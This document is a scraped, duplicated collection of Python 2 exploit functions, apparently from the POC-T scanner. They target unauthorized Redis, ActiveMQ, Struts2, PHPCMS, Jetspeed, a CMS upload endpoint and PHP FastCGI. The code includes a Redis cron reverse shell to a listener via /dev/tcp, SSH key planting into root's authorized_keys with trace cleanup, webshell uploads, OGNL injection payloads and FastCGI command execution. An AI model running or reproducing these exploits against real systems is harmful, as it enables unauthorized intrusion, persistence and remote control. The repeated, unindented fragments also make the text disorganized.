def poc(url):
url = host2IP(url)
ip = url.split(":")[0]
port = int(url.split(":")[-1]) if ":" in url else 6379
for web_port in [80, 443, 8080, 8443]: # 判断web服务
if checkPortTcp(ip, web_port):
try:
real_url = redirectURL(ip + ":" + str(web_port))
except Exception:
real_url = ip + ":" + str(web_port)
break # TODO 这里简单化处理,只返回了一个端口的结果
else:
return False
try:
r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
if "redis_version" not in r.info(): # 判断未授权访问
return False
key = randomString(5)
value = randomString(5)
r.set(key, value) # 判断可写
r.config_set("dir", "/root/") # 判断对/var/www的写入权限(目前先判断为root)
r.config_set("dbfilename", "dump.rdb") # 判断操作权限
r.delete(key)
r.save() # 判断可导出
except Exception, e:
return False
def poc(url):
if '://' not in url:
if ':443' in url:
url = 'https://' + url
else:
url = 'http://' + url
url = get_domain(url).rstrip('/')
user = randomString(6)
password = randomString(6)
url1 = url + '/jetspeed/services/usermanager/users/?_type=json'
data1 = {
'name': user,
'password': password,
'password_confirm': password,
'user_name_given': 'foo',
'user_name_family': 'bar',
'user_email': '*****@*****.**',
'newrule': ''
}
try:
requests.post(url1, data=data1, headers={'User-Agent': firefox}, timeout=10, verify=False)
c = requests.post(url1, data=data1, headers={'User-Agent': firefox}, timeout=10, verify=False).content
# response: org.apache.jetspeed.security.SecurityException.PRINCIPAL_ALREADY_EXISTS
if 'PRINCIPAL_ALREADY_EXISTS' in c:
if not ENABLE_EXP:
return True
else:
return False
except Exception, e:
if not ENABLE_EXP:
return False
def poc(url):
url = host2IP(url)
ip = url.split(':')[0]
port = int(url.split(':')[-1]) if ':' in url else 6379
for web_port in [80, 443, 8080, 8443]: # 判断web服务
if checkPortTcp(ip, web_port):
try:
real_url = redirectURL(ip + ':' + str(web_port))
except Exception:
real_url = ip + ':' + str(web_port)
break # TODO 这里简单化处理,只返回了一个端口的结果
else:
return False
try:
r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
if 'redis_version' not in r.info(): # 判断未授权访问
return False
key = randomString(5)
value = randomString(5)
r.set(key, value) # 判断可写
r.config_set('dir', '/root/') # 判断对/var/www的写入权限(目前先判断为root)
r.config_set('dbfilename', 'dump.rdb') # 判断操作权限
r.delete(key)
r.save() # 判断可导出
except Exception, e:
return False
def poc(url):
url = url if '://' in url else 'http://' + url
path = url + '/dapur/apps/app_theme/libs/'
filename = randomString(5) + '.php'
upload_path = path + 'save_file.php'
shell_path = path + filename
plain, cipher = randomMD5()
post_data = {
'content': '<?php echo md5("{}");?>'.format(plain),
'src': filename
}
header_data = {'Referer': 'http://localhost/'}
try:
r = requests.post(url=upload_path,
data=post_data,
headers=header_data,
timeout=3)
shell = requests.get(shell_path)
if r.status_code is 200 and cipher in shell.content:
return True
except Exception:
return False
return False
def poc(host):
ans = []
base_time = getResponseTime(randomString(), host)
for user in users:
if getResponseTime(user, host) - base_time > delay:
ans.append(user)
return ans if ans.__len__() else False
def poc(host):
ans = []
base_time = getResponseTime(randomString(), host)
for user in users:
if getResponseTime(user, host) - base_time > delay:
ans.append(user)
return ans if ans.__len__() else False
def poc(base):
base = "http://" + base if "://" not in base else base
name = randomString(5)
uri = "{url}/admin/{name}.jsp".format(url=base.rstrip("/"), name=name)
target = r"{url}/fileserver/sex../../..\admin/{name}.jsp".format(url=base.rstrip("/"), name=name)
key = base64.b64encode("admin:admin")
headers = {"Authorization": "Basic %s}" % key, "User-Agent": "Mozilla/5.0 Gecko/20100101 Firefox/45.0"}
put_data = JSP_UPLOAD if ENABLE_EXP else randomString(10)
try:
res1 = requests.put(target, headers=headers, data=put_data, timeout=10)
res2 = requests.get(uri, headers=headers, timeout=10)
if res1.status_code == 204 and res2.status_code == 200:
if ENABLE_EXP:
return uri
return uri if put_data in res2.content else False
except Exception, error:
# print error
return False
def poc(url):
if '://' not in url:
if ':443' in url:
url = 'https://' + url
else:
url = 'http://' + url
url = get_domain(url).rstrip('/')
user = randomString(6)
password = randomString(6)
url1 = url + '/jetspeed/services/usermanager/users/?_type=json'
data1 = {
'name': user,
'password': password,
'password_confirm': password,
'user_name_given': 'foo',
'user_name_family': 'bar',
'user_email': '*****@*****.**',
'newrule': ''
}
try:
requests.post(url1,
data=data1,
headers={'User-Agent': firefox},
timeout=10,
verify=False)
c = requests.post(url1,
data=data1,
headers={
'User-Agent': firefox
},
timeout=10,
verify=False).content
# response: org.apache.jetspeed.security.SecurityException.PRINCIPAL_ALREADY_EXISTS
if 'PRINCIPAL_ALREADY_EXISTS' in c:
if not ENABLE_EXP:
return True
else:
return False
except Exception, e:
if not ENABLE_EXP:
return False
def poc(base):
base = "http://" + base if '://' not in base else base
name = randomString(5)
uri = '{url}/admin/{name}.jsp'.format(url=base.rstrip('/'), name=name)
target = r'{url}/fileserver/sex../../..\admin/{name}.jsp'.format(
url=base.rstrip('/'), name=name)
key = base64.b64encode("admin:admin")
headers = {
'Authorization': 'Basic %s}' % key,
'User-Agent': 'Mozilla/5.0 Gecko/20100101 Firefox/45.0'
}
put_data = JSP_UPLOAD if ENABLE_EXP else randomString(10)
try:
res1 = requests.put(target, headers=headers, data=put_data, timeout=10)
res2 = requests.get(uri, headers=headers, timeout=10)
if res1.status_code == 204 and res2.status_code == 200:
if ENABLE_EXP:
return uri
return uri if put_data in res2.content else False
except Exception:
return False
return False
def poc(url):
url = url if '://' in url else 'http://' + url
url = url.split('#')[0].split('?')[0].rstrip('/').rstrip('/index.php')
data = {
"siteid": "1",
"modelid": "1",
"username": randomString(10),
"password": randomString(10),
"email": "{}@qq.com".format(randomString()),
"info[content]": "<img src={}?.php#.jpg>".format(PUBLIC_URL),
"dosubmit": "1",
"protocol": "",
}
target_url = url + "/index.php?m=member&c=index&a=register&siteid=1"
try:
r = requests.post(target_url, data=data, timeout=TIMEOUT)
if "MySQL Error" in r.content and "http" in r.content:
successUrl = r.text[r.text.index("http"):r.text.index(".php")] + ".php"
return successUrl
except Exception:
return False
def poc(url):
if '://' not in url:
url = 'http://' + url
if '?' in url:
url = url.split('?')[0]
if '.action' not in url:
url = redirectURL(url)
key = randomString()
payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
target = (url + payload)
try:
c = requests.get(target, headers={'User-Agent': firefox()}, timeout=5).content
if key in c and 'xwork2.dispatcher' not in c:
return url
except Exception, e:
return False
def poc(url):
if '://' not in url:
url = 'http://' + url
if '?' in url:
url = url.split('?')[0]
if '.action' not in url:
url = redirectURL(url)
key = randomString()
payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
target = (url + payload)
try:
c = requests.get(target, headers={
'User-Agent': firefox()
}, timeout=5).content
if key in c and 'xwork2.dispatcher' not in c:
return url
except Exception, e:
logging.debug(e)
def poc(url):
url = host2IP(url)
ip = url.split(':')[0]
port = int(url.split(':')[-1]) if ':' in url else 6379
try:
r = redis.Redis(host=ip, port=port, db=0, socket_timeout=10)
if 'redis_version' in r.info():
payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1\n\n'.format(ip=listen_ip,
port=str(listen_port))
path = '/var/spool/cron'
name = 'root'
key = randomString(10)
r.set(key, payload)
r.config_set('dir', path)
r.config_set('dbfilename', name)
r.save()
r.delete(key) # 清除痕迹
r.config_set('dir', '/tmp')
return True
except Exception, e:
# print e
return False
def poc(url):
url = host2IP(url)
ip = url.split(':')[0]
port = int(url.split(':')[-1]) if ':' in url else 6379
try:
r = redis.Redis(host=ip, port=port, db=0, socket_timeout=10)
if 'redis_version' in r.info():
payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1\n\n'.format(
ip=listen_ip, port=str(listen_port))
path = '/var/spool/cron'
name = 'root'
key = randomString(10)
r.set(key, payload)
r.config_set('dir', path)
r.config_set('dbfilename', name)
r.save()
r.delete(key) # 清除痕迹
r.config_set('dir', '/tmp')
return True
except Exception, e:
# print e
return False
def poc(url):
url = host2IP(url)
ip = url.split(':')[0]
port = int(url.split(':')[-1]) if ':' in url else 6379
try:
if not checkPortTcp(ip, 22):
return False
r = redis.Redis(host=ip, port=port, db=0)
if 'redis_version' in r.info():
key = randomString(10)
r.set(key, '\n\n' + public_key + '\n\n')
r.config_set('dir', '/root/.ssh')
r.config_set('dbfilename', 'authorized_keys')
r.save()
r.delete(key) # 清除痕迹
r.config_set('dir', '/tmp')
time.sleep(5)
if testConnect(ip, 22):
return True
except Exception, e:
# print e
return False
def poc(url):
url = host2IP(url)
ip = url.split(':')[0]
port = int(url.split(':')[-1]) if ':' in url else 6379
try:
if not checkPortTcp(ip, 22):
return False
r = redis.Redis(host=ip, port=port, db=0)
if 'redis_version' in r.info():
key = randomString(10)
r.set(key, '\n\n' + public_key + '\n\n')
r.config_set('dir', '/root/.ssh')
r.config_set('dbfilename', 'authorized_keys')
r.save()
r.delete(key) # 清除痕迹
r.config_set('dir', '/tmp')
time.sleep(5)
if testConnect(ip, 22):
return True
except Exception:
return False
return False
# -*- coding: utf-8 -*- # project = https://github.com/Xyntax/POC-T # author = [email protected] """ PHP FastCGI Fileread/RCE PoC & Exp """ from plugin.util import randomString import socket PORT = 9000 EXPLOIT = False # set "True" to exec system commands COMMAND = 'whoami' PHP_FILE_PATH = '/usr/share/php/PEAR.php' FLAG = randomString(10) if EXPLOIT else ':root:' def poc(ip): payload = exp_data() if EXPLOIT else poc_data() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(3.0) try: sock.connect((ip, PORT)) sock.send(payload) ret = sock.recv(1024) sock.close() if ret.find(FLAG): return ip + ' -> ' + ret.split(FLAG)[1] if EXPLOIT else True
"""
import requests
from plugin.useragent import firefox
from plugin.util import randomString, redirectURL
def poc(url):
if '://' not in url:
url = 'http://' + url
if '?' in url:
url = url.split('?')[0]
if '.action' not in url:
try:
url = redirectURL(url)
except Exception, e:
return False
key = randomString()
payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
target = (url + payload)
try:
c = requests.get(target, headers={
'User-Agent': firefox()
}, timeout=5).content
if key in c and 'xwork2.dispatcher' not in c:
return url
except Exception, e:
return False
return False
